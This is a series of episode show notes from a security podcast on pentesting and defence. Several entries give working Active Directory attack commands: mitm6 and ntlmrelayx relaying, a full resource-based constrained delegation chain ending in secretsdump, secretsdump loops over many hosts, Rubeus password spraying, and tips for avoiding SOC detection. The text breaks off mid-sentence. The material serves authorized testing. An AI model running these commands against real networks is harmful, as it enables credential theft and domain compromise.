    • Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
    • I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
    • Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)

    7MS #551: Interview with Matt Warner of Blumira Dec 16, 2022

    Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira) back to the show for a third time (his first appearance was #507 and second was #529).

    I complained to Matt about how so many SIEM/SOC solutions don't catch early warning signs of evil things lurking in customer networks. Specifically, I whined about 7 specific, oft-missed attacks like port scanning, Kerberoasting, ASREPRoasting, password spraying and more. (Shameless self-promotion opportunity: I will be discussing these attacks on an upcoming livestream on December 29).

    Matt dives into each of these attacks and shares some fantastic insights into what they look like from a defensive perspective, and also offers practical strategies and tools for detecting them!

    Note: during the discussion, Matt points out a lot of important Active Directory groups to keep an eye on from a membership point of view. Those groups include:

    • ASAAdmins
    • Account Operators
    • Administrators
    • Administrators
    • Backup Operators
    • Cert Publishers
    • Certificate Service DCOM
    • DHCP Administrators
    • Debugger Users
    • DnsAdmins
    • Domain Admins
    • Enterprise Admins
    • Enterprise Admins
    • Event Log Readers
    • ExchangeAdmins
    • Group Policy Creator Owners
    • Hyper-V Administrators
    • IIS_IUSRS
    • IT Compliance and Security Admins
    • Incoming Forest Trust Builders
    • MacAdmins
    • Network Configuration Operators
    • Schema Admins
    • Server Operators
    • ServerAdmins
    • SourceFireAdmins
    • WinRMRemoteWMIUsers
    • WorkstationAdmins
    • vCenterAdmins

    7MS #550: Tales of Pentest Fail - Part 5 Dec 09, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Hey friends, today's episode is extra special because it's our first episode we've ever done live and with video(!). Will we do it again? Who knows. But anyway, we had a fun time talking about things that have gone not so well during pentesting lately, specifically:

    • Things we keep getting caught doing (and some potential ways to not get caught!
      • Responder
      • SharpHound
      • CrackMapExec - specifically running -x or -X to enumerate systems
      • PowerHuntShares
    • "FUD sprinklers" - people who cast fear, uncertainty and doubt on your pentest findings
    • A story about the time I took down a domain controller (yikes)

    7MS #549: Interview with Christopher Fielder and Daniel Thanos of Arctic Wolf Dec 02, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today my friends Christopher Fielder and Daniel Thanos from Arctic Wolf chat with me about what kinds of icky things bad guys/gals are doing to our networks, and how we can arm ourselves with actioanble threat intelligence and do something about it!

    P.S. This is Christopher's seventh time on the program. Be sure to check out his first, second, third, fourth, fifth and sixth interviews with 7MS.


    7MS #548: Tales of Pentest Pwnage - Part 44 Nov 25, 2022

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Happy belated Thanksgiving!

    This is not a brag or a flex, but this episode covers a coveted achievement I haven't achieved in my whole life...until now: TDAD: Triple Domain Admin Dance!!!!1111!!!1!1!!!!

    We talk about the fun attack path that led to the TDAD (hint: always check Active Directory user description fields!), as well as a couple quick, non-spoilery reviews of a few movies: V for Vendetta and The Black Phone.


    7MS #547: Tales of Pentest Pwnage - Part 43 Nov 18, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today we're talking about tales of pentest pwnage - specifically how much fun printers can be to get Active Directory creds. TLDL: get into a printer interface, adjust the LDAP lookup IP to be your Kali box, run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface in order to (potentially) capture an Active Directory cred!

    Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.


    7MS #546: Securing Your Mental Health - Part 3 Nov 11, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today we're talking about securing your mental health! I share some behind-the-scenes info about my own mental health challenges, and share a great tip a counselor gave me for getting into a good headspace before heading into a difficult conversation/situation.


    7MS #545: First Impressions of Snipe-IT Nov 04, 2022

    Today’s episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms.

    Hey friends, today we're giving you a first impressions look at a free easy asset management tool called Snipe-IT you can use to build your inventory with! Why is this important? Because it's the first critical security control! It might help to see this tool in action, so we invite you to check out our recent Twitch stream where we got it up and running in about 45 minutes.


    7MS #544: Interview with Nato Riley of Blumira Oct 28, 2022

    Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms!

    Today we have a really fun interview with Nato Riley of Blumira. He cut his IT/security teeth working for a cell phone company, exorcising malware demons out of workstations, and even building an email-based SIEM. He has had a very cool career path that involves embracing newbness, pushing aside imposter syndrome, and even begging for jobs! I think this interview can best be summed up by a direct quote from Nato:

    "Things absolutely go wrong, and I think that's what deters people from trying. But just because something goes wrong, doesn't mean you're necessarily going to die from it. So why not try?"


    7MS #543: How to Succeed in Business Without Really Crying - Part 12 Oct 21, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Hey friends! Today we talk about a SoSaaS (Spreadsheet on Steroids as a Service...not a real thing) that is helping 7MinSec be more organized - both from a project standpoint and from an "alert us when important things are due!" standpoint.


    7MS #542: Eating the Security Dog Food - Part 5 Oct 14, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In today's episode we talk more about eating the security dog food (following the best practices we preach!). Specifically, we focus on keeping that bloated email inbox a little more lean and mean. There are lots of tools/services to help with this, but we had a blast playing with MailStore (not a sponsor but we'd like them to be:-).


    7MS #541: Tales of Blue Team Bliss - Part 2 Oct 07, 2022

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today we talk about configuring your Active Directory with MFA protection thanks to AuthLite.

    In the tangent department, we give you a short, non-spoilery review of the film Smile.


    7MS #540: Tales of Blue Team Bliss Sep 30, 2022

    Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include:

    • The ms-ds-machineaccount-quota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain.

    • We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream.

    • Defensive security tools that can interrupt the SharpHound collection!

    • EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!


    7MS #539: Eating the Security Dog Food - Part 4 Sep 23, 2022

    Today we revisit a series we haven’t touched in a long time all about eating the security dog food. TLDL about this series is I often find myself preaching security best practices, but don’t always follow them as a consultancy. So today we talk about:

    • How the internal 7MS infosec policy development is coming along
    • Why I’m no longer going to be “product agnostic” going forward
    • Some first impressions of a new tool I’m trying called ITGlue (not a sponsor)
    • How to start building a critical asset list - and how it shouldn’t overlook things like domain names and LetsEncrypt certs

    Also, don’t forget we are doing weekly livestreams on security topics!


    7MS #538: First Impressions of Airlock Digital Sep 16, 2022

    Hey friends! Today we're giving you a first impressions episode all about Airlock Digital, an application allowlisting solution. They were kind enough to let us play with it in our lab with the intention of exploring its bells and whistles, so we're excited to report back our findings in podcast form.

    TLDL: we really like this solution! It is easy to deploy (see this YouTube video for a quick walkthrough). Once I had it going in the lab, I tried administering it without reading any of the documentation, and figured out most of the workflows with ease. I just ran into a couple questions that the Airlock folks were great about answering quickly.

    I want to better understand the "Microsoft way" to do application allowlisting - using their standard offering or something like AaronLocker. But several colleagues have told me they had "OMG moments" where a C-level staff member suddenly needed to run something like ringcentral.exe and they weren't able to because of app blocklisting. It then becomes difficult to quickly allow that .exe to run without pushing GPO updates or having someone log in as local admin or something like that. But Airlock has a cool, killer feature to address this need...take a listen to today's program to learn more!


    7MS #537: Tales of Pentest Pwnage - Part 42 Sep 09, 2022

    In today's episode we share some tips we've picked up in the last few weeks of pentesting, with hopes it will save you from at least a few rounds of smashing your face into the keyboard. Tips include:

    • If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line:

    cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"'

    Then you can scan with nmap to find the "live" hosts:

    nmap -sn -iL targets.txt

    • For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions.

    • If you have RBCD admin access to victim systems, don't forget that CrackMapExec support Kerberos! So you can do stuff like:

    cme smb VICTIM-SYSTEM -k --sam or cme smb VICTIM-SYSTEM -k -M wdigest -M ACTION=enable

    • Take the time to search SMB shares with something like PowerHuntShares. If you have write access in places, drop an SCF file to capture/pass hashes!

    • Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp!

    • Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!


    7MS #536: Interview with Amanda Berlin of Blumira Sep 02, 2022

    Today we're so excited to welcome Amanda Berlin, Lead Incident Detection Engineer at Blumira, back to the show (did you miss Amanda's first appearance on the show? Check it out here)! You might already be familiar with Amanda's awesome Defensive Security Handbook or her work with the Mental Health Hackers organization. Today we virtually sat down to tackle a variety of topics and questions, including:

    • What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange? Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them?
    • Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)? Spoiler alert: yes.
    • Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec?
    • Does Amanda think there's a gender bias in the security industry?
    • Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?

    7MS #535: Rage Against the Remediation Aug 27, 2022

    Today's episode covers three remediation-focused topics that kind of grind my gears and/or get me frustrated with myself. I'm curious for your thoughts on these, so reach out via Slack or Twitter and maybe we'll do a future live stream on this topic.

    1. How do you get clients to actually care when we explain the threats on their network that are a literal 10/10 on the CVSS scale?

    2. Password policies - they're not just as easy as "Have a password of X length with Y complexity."

    3. Fixing the various broadcast traffic and protocol issues that give us easy wins with Responder and mitm6 - it's more nuanced than just "Disable LLMNR/NETBIOS/MDNS and shut off IPv6." This article discusses these challenges in more detail.


    7MS #534: Tales of Pentest Pwnage - Part 41 Aug 19, 2022

    Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points:

    • If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it!
    #!/bin/bash File="localadmin.txt" Lines=$(cat $File) for Line in $Lines do echo --- $Line --- >> dump.txt echo --------------------- >> dump.txt sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt echo --------------------- >> dump.txt done

    From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance.

    • Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm!

    • The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)


    7MS #533: Tales of Pentest Pwnage - Part 40 Aug 12, 2022

    Ok, ok, I know. I almost always say something like "Today is my favorite tale of pentest pwnage." And guess what? Today is my favorite tale of pentest pwnage, and I don't even know how it's going to end yet, so stay tuned to next week's (hopefully) exciting conclusion. For today, though, I've got some pentest tips to hopefully help you in your journeys of pwnage:

    • PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them. Note there is a -Threads flag to adjust the intensity of your scan.
    • Are your mitm6 attacks not working properly - even though they look like they should? There might be seem LDAP/LDAPs protections in play. Use LdapRelayScan to verify!
    • Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working? Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1. Also look at PassTheCert as another tool to abuse ADCS vulnerabilities.

    Example syntax for LdapCurrentUser:

    Get-LdapCurrentUser -certificate my.pfx -server my.domain.controller:636 -usessl -CertificatePassword admin

    • If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset. That way you can quickly find users who haven't changed their password since the AD backup:

    get-aduser -filter * -server victimdomain.local -properties pwdlastset,passwordlastset,enabled | where { $_.Enabled -eq $True} | select-object samaccountname,passwordlastset | sort-object passwordlastset


    7MS #532: Tales of Pentest Pwnage - Part 39 Aug 05, 2022

    Hey friends, wow...we're up to thirty-nine episodes of pwnage? Should we make a cake when we hit the big 4-0?! Anyway, today's TLDL is this:

    If you get a nagging suspicion about something you find during enumeration, make sure to either come back to it later, or exhaust the path right away so you don't miss something! Because I did :-/

    A tip that's been helping me speed along my use of CrackMapExec and other tools is by using Kerberos authentication. You can grab a ticket for your test AD account by using Impacket like so:

    gettgt.py victim.domain/LowPrivUser export KRB5CCNAME=LowPrivUser.ccache

    Then in most tools you can pass the cred by doing something like:

    crackmapexec smb DC01 -k

    In my enumeration of this network, I used Certipy to find potential attack paths against Active Directory Certificate Services. Something cool I learned is that Certipy will spit out both a text and json dump so you can import into BloodHound and then pair that data with their custom queries json file for beautiful visual potential pwnage!

    I ran into an issue where my certificate shenanigans resulted in an KDC_ERR_PADATA_TYPE_NOSUPP. I originally gave up on this attack path, only to learn about this awesome PassTheCert tool from this rad blog post! After initially being hesitant to use a tool I'd never heard of, I raised a GitHub issue to calm my nerves and, shortly after, found myself doing a domain admin dance.

    Oh, and although I didn't use it on this specific pentest, coercer is an awesome tool that helps you, ya know, coerce things!


    7MS #531: Interview with Christopher Fielder and Eugene Grant of Arctic Wolf Aug 01, 2022

    Today we're joined by some of our friends at Arctic Wolf - Eugene Grant and Christopher Fielder - to talk about compliance. Now hold on - don't leave yet! I know for many folks, compliance makes them want to bleach their eyeballs. But compliance is super important - especially because it is not the same as being secure. So we discuss the differences between security and compliance, and practical work we can do to actually be more compliant and secure, including:

    • Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out!
    • Creating core policies and procedures that you will actually follow
    • Learning about security frameworks that will help you build a security program from scratch
    • Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit!
    • Knowing where your crown jewels are - be that data, a database, a key system, etc.
    • Writing critical documentation - especially backup/restore procedures.
    • Forming a security "dream team" to help drive your program
    • Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!)

    P.S. this is Christopher's sixth time on the program. Be sure to check out his first, second, third, fourth and fifth interviews with 7MS.


    7MS #530: Tales of Pentest Pwnage - Part 38 Jul 22, 2022

    Hey friends, we have another fun tale of pwnage for you today. I loved this one because I got to learn some new tools I hadn't used before, such as:

    • Get-InternalSubnets.ps1 - for getting internal subnets
    • Adalanche for grabbing Active Directory info (similar to SharpHound)

    This tool worked well for me with this syntax:

    adalanche-windows-x64-v2022.5.19.exe collect activedirectory --domain victim.domain --port=389 --tlsmode=NoTLS
    • Copernic Desktop Search for pillaging through shares with Google-like search capabilities!

    • PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions!

    • CeWL for creating awesome wordlists to crack with!

    I don't have a Toyota TRD Pro, but I can't stop watching this reel.


    7MS #529: Interview with Matthew Warner of Blumira Jul 15, 2022

    Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11!

    Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including:

    • How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?

    • Why open source detections are a great starting point - but not a magic bullet

    • Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend?

    • Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?

    • Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?

    • Common lateral movement tools/techniques

    • Why honeypots rule!


    7MS #528: Securing Your Family During and After a Disaster - Part 6 Jul 08, 2022

    In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for:

    • Do we have creds to log onto his computer?
    • How about his email accounts?
    • Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
    • For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
    • Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
    • What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
    • Do we have redundancy in this plan, or is it all on paper in a file somewhere?

    7MS #527: First Impressions of Purple Knight Jul 01, 2022

    In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489.


    7MS #526: Tales of Pentest Pwnage - Part 37 Jun 24, 2022

    Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO:

    • Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible!

    In regards to defending against secretsdump, this article I found this article to be super interesting.


    7MS #525: First Impressions of InsightIDR - Part 2 Jun 17, 2022

    Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks:

    • Active Directory enumeration via SharpHound

    • Password spraying through Rubeus

    • Kerberoasting and ASREPRoasting via Rubeus

    • Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi.

    • Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping.

    • Pass-the-hash attacks with CrackMapExec

    In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves:

    • Getting Started with Rapid7 InsightIDR: A SIEM Tutorial
    • Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

    7MS #524: How to Update VMWare ESXi From the Command Line Jun 10, 2022

    I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY

    Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates:

    1. List all upgrade profiles:
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
    1. Grep for just the ones you want (in my case ESXi 7.x):
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0
    1. Apply the one you want!
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

    7MS #523: Local Administrator Password Solution - RELOADED! Jun 03, 2022

    Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017!

    Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go!

    (See the show notes for today's episode for more details!)


    7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2 May 27, 2022

    Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.


    7MS #521: Tales of Pentest Pwnage - Part 36 May 20, 2022

    Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

    # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN

    Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources.

    Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!


    7MS #520: How to Succeed in Business Without Really Crying - Part 11 May 13, 2022

    Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include:

    • Setting the right communication cadence - and communication channels - with a customer during a pentest.

    • Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here).

    • How we're using Intercom to publish self-help/FAQ articles for 7MS.


    7MS #519: Tales of Pentest Pwnage - Part 35 May 07, 2022

    Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review:

    • BloodHound edges
    • DACL Trouble: Generic All on OUs
    • AD prep bug in Windows Server 2016

    7MS #518: Interview with Amanda Berlin of Blumira Apr 27, 2022

    Today we're pumped to share a featured interview with Amanda Berlin, Lead Incident Detection Engineer at Blumira. You might already be familiar with Amanda's awesome Defensive Security Handbook or fine work with Mental Health Hackers. We polled our Slack friends and structured this interview as an AAA (Ask Amanda Anything). That resulted in a really fun chat that covered many things technical and not technical! Questions we posed to Amanda include:

    • Can you tell us more about your infosec superhero origin story and creation of your book?

    • Will there ever be a new version of the Defensive Security Handbook?

    • What blue team certs/YouTube vids/classes/conferences give the best bang for your buck?

    • Was it a mistake to invent computers?

    • From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)?

    • You can wave a magic wand and solve any three security challenges instantly - what do you choose?

    • Infosec Twitter drama. Love it? Leave it? Something inbetween?

    • Tips to prevent business email compromise?

    • How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web?

    • Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)


    7MS #517: DIY Pentest Dropbox Tips - Part 6 Apr 22, 2022

    Today we're continuing a series we haven't done in a while (click here to see the whole series) all about building and deploying pentest dropboxes for customers. Specifically, we cover:

    Auto installing Splashtop This can be done automatically by downloading your splashtop.exe install and issuing this command:

    splashtop.exe prevercheck /s /i confirm_d=0,hidewindow=1,notray=0,req_perm=0,sec_opt=2

    Auto installing Ninite This can be done in a batch script like so:

    agent.msi /quiet ninitepro.exe /select App1 App2 App3 /silent ninite-install-report.txt

    The above command installs App1, App2 and App3 silently and logs output to a file called ninite-install-report.txt

    Auto installing Uptimerobot monitoring We do this by first creating a script called c:\uptimerobot.ps1 that makes the "phone home" call to UptimeRobot:

    Start-Transcript -Path c:\heartbeat.log -Append Invoke-Webrequest https://heartbeat.uptimerobot.com/LONG-UNIQUE-STRING -UseBasicParsing Stop-Transcript

    Then we install the scheduled task itself like so:

    schtasks.exe /create /tn "Heartbeat" /tr "powershell -noprofile -executionpolicy bypass -file c:\uptimerobot.ps1" /rl highest /f /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM"

    7MS #516: Tips to Travel More Securely Apr 14, 2022

    In today's episode I talk about a cool self-defense class I took a while ago which was all about less lethal methods of protecting/defending yourself. I also talk about some safer ways to handle/hide cash while traveling on vacation.


    7MS #515: Securing Your Family During and After a Disaster - Part 5 Apr 06, 2022

    Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago. In today's episode we focus on some additional things you should be thinking about to strengthen the "in case of emergency" document you share with your close friends and family.


    7MS #514: Tales of Pentest Pwnage - Part 34 Mar 30, 2022

    Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:

    • I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile

    • Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd

    • Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error!

    • Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!

    • LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it


    7MS #513: Interview with Christopher Fielder and Jon Crotty of Arctic Wolf Mar 23, 2022

    Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the report's key points here without needing to provide an email address). The three of us dig in to talk about some of the report's specific highlights, including:

    • Many orgs are running the bare minimum (or nothing!) for endpoint protection
    • Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether
    • Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburned IT teams taking on security as part of their job descriptions as well
    • Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk
    • The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure

    P.S. this is Christopher's fifth time on the program. Be sure to check out his first, second, third and fourth interviews with 7MS.


    7MS #512: First Impressions of InsightIDR Mar 17, 2022

    Today I'm sharing some first impressions of the Rapid 7 InsightIDR as kind of a teaser for an eventual new chapter in our Desperately Seeking a Super SIEM for SMBs series. Disclaimer: remember these are first impressions. There may be some missed detections I talk about today that are a me problem and not the technology. I hope to get to the root of those unresolved issues by the time I talk more formally about InsightIDR in a future episode. Enjoy!


    7MS #511: How to Succeed in Business Without Really Crying - Part 10 Mar 11, 2022

    Today we're continuing our series focused on [owning a security consultancy], talking specifically about:

    • How not to give up on warm sales leads, even if they haven't panned out for 5+ years!

    • Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus

    • A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs


    7MS #510: First Impressions of Tailscale Mar 02, 2022

    Today we share some first impressions of Tailscale, a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!


    7MS #509: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 4 Feb 23, 2022

    Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links before users ever actually do.


    7MS #508: Tales of Pentest Pwnage - Part 33 Feb 18, 2022

    Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.

    We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:

